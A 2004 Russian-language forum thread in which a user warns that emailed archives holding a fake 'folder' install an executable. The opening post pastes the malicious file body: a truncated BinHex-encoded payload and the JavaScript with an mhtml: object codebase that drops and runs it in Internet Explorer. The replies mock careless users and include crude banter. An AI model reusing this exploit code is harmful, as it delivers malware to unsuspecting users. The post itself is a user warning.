StealsMan Жалоба Опубликовано 26 мая, 2004 Уже несколько моих знакомых челов напоролись на эту дрянь. Вообщем, по мылу приходит письмо с прикольной инфой на русском языыке, типа фоточка. Ты открываешь архивчик, а в нем открываешь только лишь папку (folder) и все. У тебя на компе любой exe-шный файл (будь то вирус, или троян, или еще какая-нить хрень). Вообщем, не открывайте никакие "папки", пришедшие по сети. Кстати, расширение может быть любое. Подробнее читайте тут: ссылка Вот тело файла (любого, т.е. он может быть даже папкой): <html> MIME-Version: 1.0 Content-Location:file.exe Content-Transfer-Encoding: mac-binhex40 (This file must be converted with BinHex 4.0) :#9"*6N0),N9B43"*3Ndr58*02`#3"#-!N!@*J%eDN!!!!`#3!`3!N!0343!!6!% <--! ТЕЛО ФАЙЛА !--> @9Ip6"+[Vi$2*3Im6%mRr%h,i``,5G3@+&NB5dX2`N!!#!*!*9!%!!2#3!!)!N"9 K!3!!E`%!N!SJP`!!: <title>|</title> <body bgcolor=black scroll=no> <script> function zoh(){ z=document.URL; p=z.substr(-0,z.lastIndexOf("\\")); p=unescape(p); document.write( '<title></title><body scroll=no bgcolor=#FFFFFF>.........<object classid="clsid:77777777-7777-7777-7777" codebase="mhtml:'+p+'\\1.folder!file.exe" width=1 height=1></object>'); } document.write(''); setTimeout("zoh()",0); </script> После этого в папке Windows появляется файл "1.folder!file.exe". Удаляется не тяжело. Если будут вопросы - пишите. Сообразим! Вставить Ник Поделиться сообщением Ссылка на сообщение
bSd Жалоба Опубликовано 26 мая, 2004 когда же исчезнут эти "гуфики-пуфики" которые смотрят веб - осликом... читают спам - аутлюком... открывают приложения к письмам.... тогда меня уже точно не будет....а жаль.... зы.....айм бэк......был забанен на месяц.....просто у админа месячные...типа иметь его нельзя....! =))) буду опять доводить каких нить еманов и Мккойлов чтоб они злились и показывали свою занудскую и гопническую сучность... а я буду злобно ржать над их потугами меня опустить....потому что мне всё это глубоко кудряво и фиолетово!.... Вставить Ник Поделиться сообщением Ссылка на сообщение
VIPer Жалоба Опубликовано 27 мая, 2004 мне не приходило пока) тьфу тьфу) Вставить Ник Поделиться сообщением Ссылка на сообщение